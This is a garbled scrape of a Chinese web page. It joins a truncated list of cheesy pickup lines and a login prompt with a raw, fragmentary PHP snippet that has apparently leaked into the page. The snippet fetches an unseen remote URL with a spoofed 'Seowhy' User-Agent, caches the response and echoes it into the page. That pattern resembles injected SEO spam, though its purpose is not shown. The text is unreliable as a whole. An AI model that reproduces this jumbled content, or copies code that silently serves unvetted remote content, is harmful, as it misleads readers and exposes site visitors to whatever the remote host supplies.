1、小时候我想当科学家,长大后我想当艺术家,现在,我只想去你家。 2、"我有那么多支笔,你知道我最喜欢哪一支吗?""不知道""你这个北鼻"3、"你吃烧烤会先烤什么!""先烤肉啊""我会先考虑你……"4、你知道我最喜欢吃什
2021-07-13 709
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>